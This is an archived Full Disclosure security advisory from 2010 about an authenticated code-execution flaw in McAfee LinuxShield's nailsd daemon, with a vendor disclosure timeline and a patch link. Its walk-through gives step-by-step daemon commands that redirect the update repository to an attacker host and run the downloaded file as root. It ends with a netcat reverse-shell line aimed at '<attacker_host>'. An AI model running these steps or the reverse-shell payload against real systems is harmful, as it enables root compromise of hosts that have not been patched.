Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

NSOADV-2010-004: McAfee LinuxShield remote/local code execution
From: NSO Research <nso-research () sotiriu de>
Date: Tue, 02 Mar 2010 22:30:00 +0100

______________________________________________________________________

NSOADV-2010-004: McAfee LinuxShield remote/local code execution
______________________________________________________________________
______________________________________________________________________

                               111101111
                        11111 00110 00110001111
                   111111 01 01 1 11111011111111
                11111  0 11 01 0 11 1 1  111011001
             11111111101 1 11 0110111  1    1111101111
           1001  0 1 10 11 0 10 11 1111111  1 111 111001
         111111111 0 10 1111 0 11 11 111111111 1 1101 10
        00111 0 0 11 00 0 1110 1 1011111111111 1111111 11  100
       10111111 0 01 0  1 1 111110 11 1111111111111  11110000011
       0111111110 0110 1110 1 0 11101111111111111011 11100  00
       01111 0 10 1110 1 011111 1 111111111111111111111101 01
       01110 0 10 111110 110 0 11101111111111111111101111101
      111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111
      111110110 10 0111110 1 0 0 1111111111111111111111111 110
    111 11111 1  1 111 1   10011 101111111111011111111 0   1100
   111 10  110 101011110010   11111111111111111111111 11 0011100
   11 10     001100     0001      111111111111111111 10 11 11110
  11110       00100      00001     10 1  1111  101010001 11111111
  11101        0  1011     10000    00100 11100        00001101 0
  0110         111011011             0110   10001        101 11110
  1011                 1             10 101   000001        01   00
   1010 1                              11001      1 1        101  10
      110101011                          0 101                 11110
            110000011
                      111
______________________________________________________________________
______________________________________________________________________

  Title:                  McAfee LinuxShield remote/local code
                          execution
  Severity:               Medium
  Advisory ID:            NSOADV-2010-004
  Found Date:             07.12.2009
  Date Reported:          05.02.2010
  Release Date:           02.03.2010
  Author:                 Nikolas Sotiriu (lofi)
  Website:                http://sotiriu.de
  Twitter:                http://twitter.com/nsoresearch
  Mail:                   nso-research at sotiriu.de
  URL:                    http://sotiriu.de/adv/NSOADV-2010-004.txt
  Vendor:                 McAfee (http://www.mcafee.com/)
  Affected Products:      McAfee LinuxShield <= 1.5.1
  Not Affected Products:  McAfee LinuxShield 1.5.1 with HF550192
  Remote Exploitable:     Yes (attacker must be authenticated)
  Local Exploitable:      Yes
  Patch Status:           Vendor released a patch (See Solution)
  Discovered by:          Nikolas Sotiriu
  Thanks to:              Thierry Zoller: For the permission to use his
                                          Policy


Background:
===========

LinuxShield detects and removes viruses and other potentially unwanted
software on Linux-based systems. LinuxShield uses the powerful McAfee
scanning engine — the engine common to all our anti-virus products.

Although a few years ago, the Linux operating system was considered a
secure environment, it is now seeing more occurrences of software
specifically written to attack or exploit security weaknesses in
Linux-based systems. Increasingly, Linux-based systems interact with
Windows-based computers. Although viruses written to attack Windows-
based systems do not directly attack Linux systems, a Linux server
can harbor these viruses, ready to infect any client that connects to
it.

When installed on your Linux systems, LinuxShield provides protection
against viruses, Trojan horses, and other types of potentially
unwanted software.

LinuxShield scans files as they are opened and closed — a technique
known as on-access scanning. LinuxShield also incorporates an
on-demand scanner that enables you to scan any directory or file in
your host at any time.

When kept up-to-date with the latest virus-definition (DAT) files,
LinuxShield is an important part of your network security. We
recommend that you set up an anti-virus security policy for your
network, incorporating as many protective measures as possible.

LinuxShield uses a web-browser interface, and a large number of
LinuxShield installations can be centrally controlled by ePolicy
Orchestrator.

(Product description from LinuxShield Product Guide)



Description:
============

This vulnerability allows remote attackers to execute arbitrary code
on vulnerable installations of McAfee LinuxShield. User interaction
is not required to exploit this vulnerability but an attacker must
be authenticated.

The LinuxShield Webinterface communicates with the localy installed
"nailsd" daemon, which listens on port 65443/tcp, to do configuration
changes, query the configuration and execute tasks.

Each user, which can login to the victim box, can also authenticate
it self to the "nailsd" and can do configuration changes and execute
tasks with root privileges.

A direct execution of commands is not possible, but it is possible to
download and execute code through manipulation of the config and
execute schedule tasks of the LinuxShield.


walk-through (after the TLS handshake):
+--------------------------------------

nailsd  > +OK welcome to the NAILS Statistics Service
attacker> auth <user> <pass>
nailsd  > +OK successful authentication

# Set the Attacker repository to download our code from a httpd
# (catalog.z)
#---------------------------------------------------------------
attacker> db set 1 _table=repository status=1 siteList=<?xml\ version
          ="1.0"\ encoding="UTF-8"?><ns:SiteLists\ xmlns:ns="naSiteLi
          st"\ GlobalVersion="20030131003110"\ LocalVersion="20091209
          161903"\ Type="Client"><SiteList\ Default="1"\ Name="SomeGU
          ID"><HttpSite\ Type="repository"\ Name="EvilRepo"\ Order="1
          "\ Server="<attackerhost>:80"\ Enabled="1"\ Local="1"><Rela
          tivePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></
          UserName><Password\ Encrypted="0"/></HttpSite></SiteList></
          ns:SiteLists> _cmd=update
nailsd  > +OK database changes buffered.

# Execute task to set the attacker repository
#---------------------------------------------------------------
attacker> task setsitelist
nailsd  > +OK setting sitelist from CMA.

# Execute the default Update task to download the code
#---------------------------------------------------------------
attacker> task nstart LinuxShield Update
nailsd  > +OK task LinuxShield Update starting

# Create a Scan profile, which executes our code. The profiles are
# not stored in the database.
# Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
#---------------------------------------------------------------
attacker> sconf ODS_99 begin
nailsd  > +OK 1260400888

# Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
# where our earlier downloaded catalog.z file is stored.
# (/opt/McAfee/cma/scratch/update/catalog.z)
#---------------------------------------------------------------
attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
          true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
          DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
          10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
          ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
          file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
          ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
          ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
          .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
          risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
          e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
          .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
          le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
          dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
          e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
          ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
          o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
          .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
          rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
          ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
          00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
          ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
          ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
           nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
          ofile.ODS_99.filter.extensions.type=extension nailsd.profil
          e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
          .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
          action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
          econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
          ss nailsd.profile.ODS_99.action.error=Block
nailsd  > +OK configuration changes buffered
attacker> sconf ODS_99 commit 1260400888
nailsd  > +OK configuration changes stored

# Set a scan task with the manipulated profile to execute the code
#---------------------------------------------------------------
attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
          pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
          mp;exclude:false timetable=type=unscheduled taskResults=0 i
          _lastRun=1260318482 status=Stopped _cmd=insert
nailsd  > +OK database changes buffered

# Execute scan task to execute the code
#---------------------------------------------------------------
attacker> task nstart Evil Task

+-------------------------------------- walk-through EOF


To get a reverse root shell place something like this in the catalog.z

--- snip ---
#!/bin/sh
nc -nv <attacker_host> 4444 -e /bin/sh
--- /snip ---



Proof of Concept :
==================

http://sotiriu.de/software/NSOPOC-2010-004.tar.gz



Solution:
=========

McAfee Advisory
+--------------
https://kc.mcafee.com/corporate/index?page=content&id=SB10007



Disclosure Timeline (YYYY/MM/DD):
=================================

2009.12.07: Vulnerability found
2010.02.03: Asked vendor for a PGP key
2010.02.05: Vendor sent his PGP key
2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
            date (2010.02.18) to Vendor
2010.02.05: Vendor acknowledges the reception of the advisory
2010.02.16: Ask for a status update, because the planned release date is
            2010.02.18.
2010.02.16: Vendor response that, they are currently working on a patch
2010.02.17: Changed release date to 2010.02.25.
2010.02.22: Vendor gives a status update, that they are able to release
            the patch on 2010.02.25.
2010.02.24: Ask for a list of affected products and the advisory url.
2010.02.24: Vendor sends the list.
2010.03.02: Release of this Advisory






_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • NSOADV-2010-004: McAfee LinuxShield remote/local code execution NSO Research (Mar 02)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]